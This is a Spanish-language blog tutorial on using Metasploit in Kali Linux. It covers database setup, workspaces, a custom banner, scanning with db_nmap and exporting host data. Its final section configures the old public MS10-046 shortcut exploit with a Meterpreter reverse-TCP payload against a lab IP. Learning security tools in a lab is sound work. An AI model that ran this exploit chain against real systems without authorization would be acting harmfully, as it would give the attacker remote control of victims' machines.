Advertisement

header ads

APRENDE METASPLOIT EN KALI LINUX (ADVANCED)

Hace un tiempo estuve mostrando en los historiales de INSTAGRAM sobre un método para aprender metasploit y hoy vengo a compartirlo.



Antes de empezar vamos a usar metasploit con los exploit públicos pero veamos la configuraciones que podemos hacer.
Tenes algunos post: HERE

¿Cómo iniciamos?

Podemos activar el postgresql
service postgresql start
Lo ejecutamos con banner
msfconsole
Lo ejecutamos sin banner(más rápido)
msfconsole -q
help
Tenemos muchas opciones de DB, ahora vamos a ejecutar la base de datos de metasploit
msfdb start
Y para conectarlo.
db_connect -y  /usr/share/metasploit-framework/config/database.yml
Recuerda la contraseña por default la podes cambiar.
db_status
Ahora te informa que esta conectado y para purgar módulos
db_rebuild_cache
—–Otro método—
msfdb delete
msfdb init
cp /usr/share/metasploit-framework/config/database.yml /root/.msf4/
sudo service postgresql restart
sudo msfconsole
db_status
[*] postgresql connected to msf
msf >

Modo TRABAJO

Si aveces trabajas mucho con metasploit tenes el siguiente comando, recuerda que este proceso es ejecutando metasploit.
workspace -h
Para crear un workspace
workspace -a creadpag
Podes seleccionar el default o el que has creado.
workspace default
workspace creadpag
Para ver la lista
workspace

BANNER

Podemos cambiar el banner que nosotros queramos que aparezca.
cd /.msf4/logos/
nano creadpag.txt
                              ___, ____--'
                         _,-.'_,-'      (
                      ,-' _.-''....____(
            ,))_     /  ,'\ `'-.     (          /\
    __ ,+..a`  \(_   ) /   \    `'-..(         /  \
    )`-;...,_   \(_ ) /     \  ('''    ;'^^`\ <./\.>
        ,_   )   |( )/   ,./^``_..._  < /^^\ \_.))
       `=;; (    (/_')-- -'^^`      ^^-.`_.-` >-'
       `=\\ (                             _,./
         ,\`(                         )^^^
           ``;         __-'^^\       /
             / _>emj^^^   `\..`-.    ``'.
            / /               / /``'`; /
           / /          ,-=='-`=-'  / /
     ,-=='-`=-.               ,-=='-`=-.
   *******************************************
export MSFLOGO=~/.msf4/logos/creadpag.txt

NMAP

Podemos usar nmap en metasploit pero recuerda, que podes usar los mismos comandos que usas en un nmap.
db_nmap -sV -sC 192.168.1.8
Al usar nmap, podemos ver los host que hemos analizado
hosts

Servidores

Al hacer análisis con nmap, se puede guardar los datos y con services podemos seguir viendo información de cada servidor.
services -h
services -c name,info,port,proto,state 192.168.1.8
O buscar los host con el siguiente puerto
services -c name,info,port,proto,state -p 443
Esto es un buen método para avanzar rápidamente en el curso de offsensive security, por cierto si quieren un tutorial de como analizar servidores rápidamente dejámelo saber.

REPORTE

Lo que hacemos es exportar de la información.
hosts -S windows -o /root/Desktop/windows.csv

Attack

Ahora usemos un exploit
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.7
Es la IP de tu maquina, no del atacante igual que LHOST
set LHOST 192.168.1.7
exploit
Es un exploit publico que es demasiado viejo, si quieres más tutoriales de metasploit, comentarlo.
GRACIAS! No te olvides en compartilo!

Publicar un comentario

2 Comentarios

  1. no puedo hacer nada porque me parece que guardè el mòdulo,y al entrar me inicia en el mòdulo .En consecuencia , no sè que hacer ,AYUDAAAA!!!por favor

    ResponderEliminar